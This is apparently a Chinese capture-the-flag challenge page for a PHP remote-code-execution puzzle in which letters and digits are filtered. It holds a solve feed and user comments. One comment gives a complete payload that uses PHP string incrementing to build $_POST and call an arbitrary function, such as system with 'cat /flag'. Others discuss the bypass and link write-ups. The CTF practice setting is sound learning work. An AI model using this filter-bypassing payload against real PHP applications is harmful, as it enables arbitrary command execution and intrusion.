评分(3)
解题动态
YameMres 攻破了该题 3小时前
besty2k 攻破了该题 1天前
burning321 攻破了该题 2天前
Novo 攻破了该题 4天前
15195388189 攻破了该题 6天前
她说我们只是朋友 攻破了该题 8天前
ifnoif 攻破了该题 9天前
fuchen11 攻破了该题 13天前
Jiafeng 攻破了该题 14天前
fxstu 攻破了该题 14天前
buggy 攻破了该题 17天前
szmlzw120 攻破了该题 18天前
kale 攻破了该题 18天前
lionli227 攻破了该题 19天前
chaojiikun 攻破了该题 20天前
Rounty 攻破了该题 22天前
13787026747 攻破了该题 22天前
似舞夜春 攻破了该题 23天前
2323277194 攻破了该题 23天前
评论
Jiafeng 14天前
举报
我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)
小丁小丁少发神经 2月前
举报
求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)
不会写代码的菜鸟 5月前
举报
这道题完全不是我能做的,有答案也看不懂
modeng 8月前
举报
以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
Jiafeng 14天前
举报
牛逼,可以直接造出N字符,那就好搞了;
hutiaan 9月前
举报
难,为了难而难
不懂就问 9月前
举报
参考:https://blog.csdn.net/qq_36292543/article/details/136623586
不会编程的崽 9月前
举报
自增绕过,最后的payload可以在burp里进行对特殊字符的url编码
xiaoxiao972521 9月前
举报
不做了,本地构建的脑瓜子刺挠,点跟蚊香去
Daniel2023 10月前
举报
$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);
treasure11 11月前
举报
大败而归┭┮﹏┭┮